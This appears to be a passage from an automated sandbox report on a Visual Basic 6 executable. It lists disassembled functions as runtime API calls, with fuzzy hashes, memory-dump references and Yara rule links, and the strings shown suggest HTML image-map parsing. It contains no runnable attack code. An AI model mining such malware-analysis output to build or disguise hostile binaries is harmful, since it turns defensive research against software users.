                                                                                • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00401D26), ref: 0042014E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$Free$Move$Copy$List$#537#631BstrCheckHresult
                                                                                • String ID: _blank$_parent$_search$_self$_top$circ$circle$coords$href$poly$polygon$rect$rectangle$shape$target
                                                                                • API String ID: 1777429465-1944865882
                                                                                • Opcode ID: 2ac7a639ecb2ed9e2a13de743f39c1725df32ba920b5c6ceb667fcbbac794aeb
                                                                                • Instruction ID: 08c712d641e70ee6887c4f8d6a5fe3895b375d10a0179195d0f8762a5f230e95
                                                                                • Opcode Fuzzy Hash: 2ac7a639ecb2ed9e2a13de743f39c1725df32ba920b5c6ceb667fcbbac794aeb
                                                                                • Instruction Fuzzy Hash: 22619370B003169FDB10DBA5ED85AFFB7F8EF54704F50402AE512A32A1DA79D846CB68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041BC40, Relevance: 69.4, APIs: 46, Instructions: 433COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00424100: __vbaStrCopy.MSVBVM60(?,00000000,?), ref: 0042413E
                                                                                  • Part of subcall function 00424100: #608.MSVBVM60(?), ref: 00424170
                                                                                  • Part of subcall function 00424100: __vbaVarCat.MSVBVM60(?,?,00000008), ref: 00424182
                                                                                  • Part of subcall function 00424100: __vbaStrVarMove.MSVBVM60(00000000), ref: 00424189
                                                                                  • Part of subcall function 00424100: __vbaStrMove.MSVBVM60 ref: 00424196
                                                                                  • Part of subcall function 00424100: __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 004241A2
                                                                                • __vbaUbound.MSVBVM60(00000001,00000000,?,00401610,?), ref: 0041BCAE
                                                                                • __vbaGenerateBoundsError.MSVBVM60 ref: 0041BCF9
                                                                                • __vbaGenerateBoundsError.MSVBVM60 ref: 0041BD05
                                                                                • #632.MSVBVM60(?,00004008,00000000,00000002), ref: 0041BD46
                                                                                • __vbaStrVarVal.MSVBVM60(?,?), ref: 0041BD54
                                                                                • #516.MSVBVM60(00000000), ref: 0041BD5B
                                                                                • __vbaUI1I2.MSVBVM60 ref: 0041BD63
                                                                                • __vbaFreeStr.MSVBVM60 ref: 0041BD6F
                                                                                • __vbaFreeVarList.MSVBVM60(00000002,00000002,?), ref: 0041BD7F
                                                                                • __vbaGenerateBoundsError.MSVBVM60 ref: 0041BD9F
                                                                                • __vbaGenerateBoundsError.MSVBVM60 ref: 0041BDAB
                                                                                • #608.MSVBVM60(00000002,?), ref: 0041BDE0
                                                                                • __vbaInStrVar.MSVBVM60(?,00000000,00000002,00000008,00000001), ref: 0041BDF8
                                                                                • __vbaI2Var.MSVBVM60(00000000), ref: 0041BDFF
                                                                                • __vbaFreeVarList.MSVBVM60(00000002,00000002,?), ref: 0041BE11
                                                                                • #632.MSVBVM60(?,00000008,?,00000002), ref: 0041BE62
                                                                                • __vbaStrVarMove.MSVBVM60(?,?,00000002), ref: 0041BE6C
                                                                                • __vbaStrMove.MSVBVM60(?,00000002), ref: 0041BE77
                                                                                • __vbaFreeVarList.MSVBVM60(00000002,00000002,?,?,00000002), ref: 0041BE87
                                                                                • #617.MSVBVM60(00000002,00004008,00000000), ref: 0041BEBC
                                                                                • #608.MSVBVM60(?,?), ref: 0041BEC7
                                                                                • #632.MSVBVM60(?,?,00000000,?), ref: 0041BF22
                                                                                • __vbaVarCat.MSVBVM60(?,?,00000002), ref: 0041BF3A
                                                                                • __vbaVarCat.MSVBVM60(?,00000008,00000000), ref: 0041BF48
                                                                                • __vbaVarCat.MSVBVM60(?,?,00000000), ref: 0041BF59
                                                                                • __vbaStrVarMove.MSVBVM60(00000000), ref: 0041BF5C
                                                                                • __vbaStrMove.MSVBVM60 ref: 0041BF69
                                                                                • __vbaFreeVarList.MSVBVM60(00000007,00000002,?,?,0000000A,?,?,?), ref: 0041BF93
                                                                                • __vbaFreeStr.MSVBVM60(0041BFFB), ref: 0041BFF4
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$Free$Move$List$BoundsErrorGenerate$#608#632$#516#617CopyUbound
                                                                                • String ID:
                                                                                • API String ID: 322533643-0
                                                                                • Opcode ID: 41ea95b28fc35ec7ac6a97c5160f8b06b217469a4882b2e9fd4b9f8ca8a86784
                                                                                • Instruction ID: f390c56d0e39148dad3ded0c7c6740b6b8a7593ccd57457591c175fa0d4be669
                                                                                • Opcode Fuzzy Hash: 41ea95b28fc35ec7ac6a97c5160f8b06b217469a4882b2e9fd4b9f8ca8a86784
                                                                                • Instruction Fuzzy Hash: 22024DB1D00219EFDB14DFA4DD88AEEBBB8FB48700F00816AE515B7250DB745985CFA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00421D70, Relevance: 57.9, APIs: 29, Strings: 4, Instructions: 169COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00421DC6
                                                                                • __vbaStrCmp.MSVBVM60(0040F38C,00422324,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00421DD5
                                                                                • __vbaStrCat.MSVBVM60( id=,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00421DEE
                                                                                • __vbaStrMove.MSVBVM60(00422324,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00421E0C
                                                                                • __vbaStrCat.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00421E0F
                                                                                • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00421E16
                                                                                • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00421E22
                                                                                • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00421DFB
                                                                                  • Part of subcall function 00424480: __vbaStrCopy.MSVBVM60(?,00000000,72A1A274), ref: 004244C0
                                                                                  • Part of subcall function 00424480: #537.MSVBVM60(00000022), ref: 004244CE
                                                                                  • Part of subcall function 00424480: __vbaStrMove.MSVBVM60 ref: 004244DB
                                                                                  • Part of subcall function 00424480: __vbaStrCat.MSVBVM60(?,00000000), ref: 004244E8
                                                                                  • Part of subcall function 00424480: __vbaStrMove.MSVBVM60 ref: 004244EF
                                                                                  • Part of subcall function 00424480: #537.MSVBVM60(00000022,00000000), ref: 004244F4
                                                                                  • Part of subcall function 00424480: __vbaStrMove.MSVBVM60 ref: 004244FB
                                                                                  • Part of subcall function 00424480: __vbaStrCat.MSVBVM60(00000000), ref: 004244FE
                                                                                  • Part of subcall function 00424480: __vbaStrMove.MSVBVM60 ref: 00424505
                                                                                  • Part of subcall function 00424480: __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 00424515
                                                                                  • Part of subcall function 00424480: __vbaFreeStr.MSVBVM60(00424556), ref: 0042454F
                                                                                • __vbaStrCmp.MSVBVM60(0040F38C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00421E42
                                                                                • __vbaStrCat.MSVBVM60( name=,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00421E55
                                                                                • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00421E5C
                                                                                • __vbaStrMove.MSVBVM60(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00421E6D
                                                                                • __vbaStrCat.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00421E70
                                                                                • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00421E77
                                                                                • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00421E83
                                                                                • __vbaStrCat.MSVBVM60(0040F42C,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00421E95
                                                                                • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00421E9C
                                                                                • __vbaForEachCollObj.MSVBVM60(004113E8,?,?,0042232B), ref: 00421EAF
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,004113E8,00000024), ref: 00421EDE
                                                                                • __vbaStrCat.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00421EEC
                                                                                • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00421EF3
                                                                                • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00421EF8
                                                                                • __vbaNextEachCollObj.MSVBVM60(004113E8,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00421F07
                                                                                • __vbaStrCat.MSVBVM60(</map>,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00421F18
                                                                                • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00421F1F
                                                                                • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00421F27
                                                                                • __vbaFreeObj.MSVBVM60(00421F71,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00421F60
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$Move$Free$CopyList$#537CollEach$CheckHresultNext
                                                                                • String ID: id=$ name=$</map>$<map
                                                                                • API String ID: 610381827-1714015726
                                                                                • Opcode ID: 450288ce74c810fd709b4d8f44dcdf07e54d43e21bfae3aba7d3258c40b872f7
                                                                                • Instruction ID: e9aae58b173deed54bc321b37fa2da337e912f7303d6618c3da271415f179815
                                                                                • Opcode Fuzzy Hash: 450288ce74c810fd709b4d8f44dcdf07e54d43e21bfae3aba7d3258c40b872f7
                                                                                • Instruction Fuzzy Hash: 05513071E00219AFCB04DBA4DD85DEEB7B8FF88700B10812AE516B7264DB74AD05CBA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004213C0, Relevance: 54.4, APIs: 29, Strings: 2, Instructions: 180COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __vbaStrCopy.MSVBVM60 ref: 00421415
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00401A00,00411840,00000040), ref: 00421430
                                                                                • __vbaStrCmp.MSVBVM60(?,?), ref: 0042143E
                                                                                • __vbaFreeStr.MSVBVM60 ref: 00421451
                                                                                • __vbaStrMove.MSVBVM60(?,0040F3C8), ref: 00421479
                                                                                • __vbaStrCopy.MSVBVM60 ref: 00421480
                                                                                • __vbaFreeStr.MSVBVM60 ref: 00421485
                                                                                • __vbaStrMove.MSVBVM60(?,name), ref: 0042149E
                                                                                • __vbaStrCopy.MSVBVM60 ref: 004214A5
                                                                                • __vbaFreeStr.MSVBVM60 ref: 004214AA
                                                                                • __vbaStrCopy.MSVBVM60 ref: 004214B6
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00401A00,00411840,00000020), ref: 004214CD
                                                                                • __vbaInStr.MSVBVM60(00000000,<area,?,00000001), ref: 004214E6
                                                                                • __vbaInStr.MSVBVM60(00000000,<area,?,00000001,?), ref: 0042150F
                                                                                • #631.MSVBVM60(?,00000000), ref: 00421516
                                                                                • __vbaStrMove.MSVBVM60 ref: 00421521
                                                                                • __vbaFreeVar.MSVBVM60 ref: 00421526
                                                                                • __vbaInStr.MSVBVM60(00000000,0040F42C,?,00000001), ref: 00421539
                                                                                • #616.MSVBVM60(?,00000000), ref: 00421540
                                                                                • __vbaStrMove.MSVBVM60 ref: 0042154B
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00401A00,00411840,0000001C), ref: 0042156A
                                                                                • __vbaFreeObj.MSVBVM60 ref: 00421573
                                                                                • __vbaLenBstr.MSVBVM60(?,0000000A), ref: 0042158F
                                                                                • #631.MSVBVM60(?,00000000), ref: 0042159A
                                                                                • __vbaStrMove.MSVBVM60 ref: 004215A5
                                                                                • __vbaFreeVar.MSVBVM60 ref: 004215AA
                                                                                • __vbaFreeStr.MSVBVM60(004215EE), ref: 004215E1
                                                                                • __vbaFreeStr.MSVBVM60 ref: 004215E6
                                                                                • __vbaFreeStr.MSVBVM60 ref: 004215EB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$Free$Move$Copy$CheckHresult$#631$#616Bstr
                                                                                • String ID: <area$name
                                                                                • API String ID: 1458531261-1697160873
                                                                                • Opcode ID: 586ebb249d294156a0f06dd8f4c151758e4972a44872811e8f23a2d94619b2e2
                                                                                • Instruction ID: 395a243d5fbdf9734aafbe1a0e5a0c4a0a956fe9094fa97e0b74d127df4a6424
                                                                                • Opcode Fuzzy Hash: 586ebb249d294156a0f06dd8f4c151758e4972a44872811e8f23a2d94619b2e2
                                                                                • Instruction Fuzzy Hash: 8C613371A00219ABDB04EFA5DD85EEEBBB9FF58700F10412AF502B72A0DB749946CF54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00424570, Relevance: 54.2, APIs: 36, Instructions: 238COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __vbaStrCopy.MSVBVM60(72A26A76,00401978,72A26C30), ref: 004245C2
                                                                                • __vbaStrCopy.MSVBVM60 ref: 004245CA
                                                                                  • Part of subcall function 004241F0: __vbaStrCopy.MSVBVM60(00000001,00000000,72A26C30), ref: 0042423F
                                                                                  • Part of subcall function 004241F0: __vbaStrCopy.MSVBVM60 ref: 00424247
                                                                                  • Part of subcall function 004241F0: __vbaStrCat.MSVBVM60(00411B14,?,?,00000001), ref: 00424258
                                                                                  • Part of subcall function 004241F0: __vbaStrMove.MSVBVM60 ref: 00424269
                                                                                  • Part of subcall function 004241F0: __vbaInStr.MSVBVM60(00000000,00000000), ref: 0042426D
                                                                                  • Part of subcall function 004241F0: __vbaFreeStr.MSVBVM60 ref: 0042427B
                                                                                  • Part of subcall function 004241F0: __vbaLenBstr.MSVBVM60(?), ref: 0042428D
                                                                                  • Part of subcall function 004241F0: #631.MSVBVM60(?,-00000002,?,00000001), ref: 004242C2
                                                                                  • Part of subcall function 004241F0: __vbaStrMove.MSVBVM60 ref: 004242CD
                                                                                  • Part of subcall function 004241F0: #537.MSVBVM60(00000022,00000000), ref: 004242D2
                                                                                  • Part of subcall function 004241F0: __vbaStrMove.MSVBVM60 ref: 004242DD
                                                                                  • Part of subcall function 004241F0: __vbaInStr.MSVBVM60(00000000,00000000), ref: 004242E1
                                                                                  • Part of subcall function 004241F0: __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 004242FD
                                                                                  • Part of subcall function 004241F0: __vbaFreeVar.MSVBVM60 ref: 00424309
                                                                                • __vbaStrMove.MSVBVM60(?,?), ref: 004245E6
                                                                                • __vbaStrCmp.MSVBVM60(0040F38C,00000000,?,?), ref: 004245EE
                                                                                • __vbaFreeStr.MSVBVM60(?,?), ref: 00424600
                                                                                • __vbaStrCmp.MSVBVM60(0040F38C,?,?,?), ref: 00424618
                                                                                • __vbaLenBstr.MSVBVM60(00000000,?,?), ref: 00424629
                                                                                • #616.MSVBVM60(?,-00000001,?,?), ref: 0042463C
                                                                                • __vbaStrMove.MSVBVM60(?,-00000001,?,?), ref: 00424647
                                                                                • __vbaStrCat.MSVBVM60(004117A4,00000000,?,-00000001,?,?), ref: 00424655
                                                                                • __vbaStrMove.MSVBVM60(?,-00000001,?,?), ref: 0042465C
                                                                                • __vbaStrCat.MSVBVM60(?,00000000,?,-00000001,?,?), ref: 00424663
                                                                                • __vbaStrMove.MSVBVM60(?,-00000001,?,?), ref: 0042466A
                                                                                • __vbaStrCat.MSVBVM60(00411B14,00000000,?,-00000001,?,?), ref: 00424672
                                                                                • __vbaStrMove.MSVBVM60(?,-00000001,?,?), ref: 00424679
                                                                                  • Part of subcall function 00424480: __vbaStrCopy.MSVBVM60(?,00000000,72A1A274), ref: 004244C0
                                                                                  • Part of subcall function 00424480: #537.MSVBVM60(00000022), ref: 004244CE
                                                                                  • Part of subcall function 00424480: __vbaStrMove.MSVBVM60 ref: 004244DB
                                                                                  • Part of subcall function 00424480: __vbaStrCat.MSVBVM60(?,00000000), ref: 004244E8
                                                                                  • Part of subcall function 00424480: __vbaStrMove.MSVBVM60 ref: 004244EF
                                                                                  • Part of subcall function 00424480: #537.MSVBVM60(00000022,00000000), ref: 004244F4
                                                                                  • Part of subcall function 00424480: __vbaStrMove.MSVBVM60 ref: 004244FB
                                                                                  • Part of subcall function 00424480: __vbaStrCat.MSVBVM60(00000000), ref: 004244FE
                                                                                  • Part of subcall function 00424480: __vbaStrMove.MSVBVM60 ref: 00424505
                                                                                  • Part of subcall function 00424480: __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 00424515
                                                                                  • Part of subcall function 00424480: __vbaFreeStr.MSVBVM60(00424556), ref: 0042454F
                                                                                • __vbaStrMove.MSVBVM60(?,00000000,?,-00000001,?,?), ref: 0042468A
                                                                                • __vbaStrCat.MSVBVM60(00000000,?,-00000001,?,?), ref: 0042468D
                                                                                • __vbaStrMove.MSVBVM60(?,-00000001,?,?), ref: 00424694
                                                                                • __vbaStrCat.MSVBVM60(0040F42C,00000000,?,-00000001,?,?), ref: 0042469C
                                                                                • __vbaStrMove.MSVBVM60(?,-00000001,?,?), ref: 004246A2
                                                                                • __vbaFreeStrList.MSVBVM60(00000006,?,?,?,?,?,?,?,-00000001,?,?), ref: 004246BE
                                                                                • __vbaStrCat.MSVBVM60(00411B14,?,?,00000001,?,?), ref: 004246DF
                                                                                • __vbaStrMove.MSVBVM60(?,00000001,?,?), ref: 004246EA
                                                                                • __vbaInStr.MSVBVM60(00000000,00000000,?,00000001,?,?), ref: 004246EF
                                                                                • __vbaFreeStr.MSVBVM60(?,00000001,?,?), ref: 00424703
                                                                                • #631.MSVBVM60(?,-00000002,?,00000001,?,00000001,?,?), ref: 0042472C
                                                                                • __vbaStrMove.MSVBVM60(?,-00000002,?,00000001,?,00000001,?,?), ref: 00424737
                                                                                • #537.MSVBVM60(00000022,00000000,?,-00000002,?,00000001,?,00000001,?,?), ref: 0042473C
                                                                                • __vbaStrMove.MSVBVM60(?,-00000002,?,00000001,?,00000001,?,?), ref: 00424747
                                                                                • __vbaInStr.MSVBVM60(00000000,00000000,?,-00000002,?,00000001,?,00000001,?,?), ref: 0042474C
                                                                                • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,-00000002,?,00000001,?,00000001,?,?), ref: 0042475E
                                                                                • __vbaFreeVar.MSVBVM60(00000001,?,?), ref: 0042476A
                                                                                • __vbaMidStmtBstr.MSVBVM60(00000000,?,00000000,-00000001,00420F4F,?,?), ref: 00424779
                                                                                • __vbaFreeStr.MSVBVM60(004247C4,?,?), ref: 004247BC
                                                                                • __vbaFreeStr.MSVBVM60(?,?), ref: 004247C1
                                                                                • __vbaErrorOverflow.MSVBVM60(?,00000001,?,?), ref: 004247D7
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$Move$Free$Copy$#537List$Bstr$#631$#616ErrorOverflowStmt
                                                                                • String ID:
                                                                                • API String ID: 3013909437-0
                                                                                • Opcode ID: 1b50d63d3f28da341f3a8f36a6f4667ce9a3505b347295e2f15f4c79e5da5c8b
                                                                                • Instruction ID: 6fcb04252a0202c2b8f8ca5fd4339ddcf00f1a8ffd7dc002fb0493665977cebf
                                                                                • Opcode Fuzzy Hash: 1b50d63d3f28da341f3a8f36a6f4667ce9a3505b347295e2f15f4c79e5da5c8b
                                                                                • Instruction Fuzzy Hash: 7F812075A00118AFCB04DFA4DD45EEEBBB9EF89700F10412AE906F72A4DB746D05CBA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041E780, Relevance: 51.3, APIs: 34, Instructions: 295COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __vbaNew2.MSVBVM60(0040B83C,?,00000000,?,72A1A274), ref: 0041E7EA
                                                                                • __vbaObjSetAddref.MSVBVM60(?,00000000,00000000,?,72A1A274), ref: 0041E7F7
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041124C,00000020), ref: 0041E825
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041124C,00000020), ref: 0041E84C
                                                                                • __vbaVarTextCmpNe.MSVBVM60(?,?,?), ref: 0041E85D
                                                                                • __vbaVarVargNofree.MSVBVM60(?,00000000), ref: 0041E870
                                                                                • __vbaVarTextCmpLt.MSVBVM60(?,00000000), ref: 0041E87B
                                                                                • __vbaVarAnd.MSVBVM60(?,00000000), ref: 0041E889
                                                                                • __vbaBoolVarNull.MSVBVM60(00000000), ref: 0041E890
                                                                                • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0041E8A2
                                                                                • __vbaObjSetAddref.MSVBVM60(?,?), ref: 0041E8B8
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041124C,00000028), ref: 0041E8DD
                                                                                • __vbaObjSet.MSVBVM60(?,?), ref: 0041E8EE
                                                                                • __vbaNew2.MSVBVM60(0040B83C,?), ref: 0041E90B
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041124C,0000001C), ref: 0041E930
                                                                                • __vbaFreeVar.MSVBVM60 ref: 0041E935
                                                                                • __vbaNew2.MSVBVM60(0040B83C,?), ref: 0041E951
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041124C,00000024), ref: 0041E97D
                                                                                • __vbaFreeVar.MSVBVM60 ref: 0041E988
                                                                                • __vbaNew2.MSVBVM60(0040B83C,?), ref: 0041E99A
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041124C,0000002C), ref: 0041E9BF
                                                                                • __vbaFreeVar.MSVBVM60 ref: 0041E9C4
                                                                                • __vbaObjIs.MSVBVM60(?,00000000), ref: 0041E9CC
                                                                                • __vbaNew2.MSVBVM60(0040B83C,?), ref: 0041E9E7
                                                                                • __vbaObjSetAddref.MSVBVM60(?,?), ref: 0041E9F1
                                                                                • __vbaNew2.MSVBVM60(0040B83C,?), ref: 0041EA0E
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041124C,0000002C), ref: 0041EA32
                                                                                • __vbaFreeVar.MSVBVM60 ref: 0041EA3D
                                                                                • __vbaNew2.MSVBVM60(0040B83C,?), ref: 0041EA4F
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041124C,00000024), ref: 0041EA74
                                                                                • __vbaFreeVar.MSVBVM60 ref: 0041EA79
                                                                                • __vbaFreeObj.MSVBVM60(0041EAD3), ref: 0041EAC6
                                                                                • __vbaFreeObj.MSVBVM60 ref: 0041EACB
                                                                                • __vbaFreeObj.MSVBVM60 ref: 0041EAD0
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$Free$CheckHresult$New2$Addref$Text$BoolListNofreeNullVarg
                                                                                • String ID:
                                                                                • API String ID: 752550406-0
                                                                                • Opcode ID: 1139342c647738dbdab977a375024fb19047a038a2999aba97aa880820713a15
                                                                                • Instruction ID: e98e6f880182b5f5a29ce2df0fb0223a04d9758aa2842847bc1bd9166e2d84a1
                                                                                • Opcode Fuzzy Hash: 1139342c647738dbdab977a375024fb19047a038a2999aba97aa880820713a15
                                                                                • Instruction Fuzzy Hash: 53B12BB5A00219AFDB10DBA5CD85EEEB7B8FF48B00F10411AF505F72A0D778A945CBA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00422360, Relevance: 50.9, APIs: 28, Strings: 1, Instructions: 177COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __vbaVarTstEq.MSVBVM60(?,?,00001BBC,00000000,0000000C), ref: 004223E0
                                                                                • __vbaStrVarVal.MSVBVM60(?,?,00000001), ref: 004223F9
                                                                                • #618.MSVBVM60(00000000), ref: 00422400
                                                                                • __vbaStrMove.MSVBVM60 ref: 0042240B
                                                                                • #527.MSVBVM60(00000000), ref: 00422412
                                                                                • __vbaVarMove.MSVBVM60 ref: 00422438
                                                                                • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00422444
                                                                                • __vbaVarCat.MSVBVM60(?,?,?), ref: 0042245C
                                                                                • __vbaVarMove.MSVBVM60 ref: 00422467
                                                                                • __vbaLenVar.MSVBVM60(?,?), ref: 00422488
                                                                                • __vbaVarAdd.MSVBVM60(?,00000002,00000000), ref: 0042249D
                                                                                • __vbaVarLateMemSt.MSVBVM60(?,SelStart), ref: 004224C7
                                                                                • __vbaFreeVar.MSVBVM60 ref: 004224D3
                                                                                • __vbaVarCopy.MSVBVM60 ref: 004224F2
                                                                                • __vbaSetSystemError.MSVBVM60(00000000,00000104), ref: 0042250D
                                                                                • __vbaVarCopy.MSVBVM60 ref: 00422524
                                                                                • __vbaVarMove.MSVBVM60 ref: 0042254B
                                                                                • __vbaI4Var.MSVBVM60(?,00422B56,00000000,00000104), ref: 0042255B
                                                                                • __vbaSetSystemError.MSVBVM60(00000000), ref: 00422569
                                                                                • __vbaVarTstEq.MSVBVM60(00008008,?), ref: 00422595
                                                                                • __vbaVarCopy.MSVBVM60 ref: 004225BD
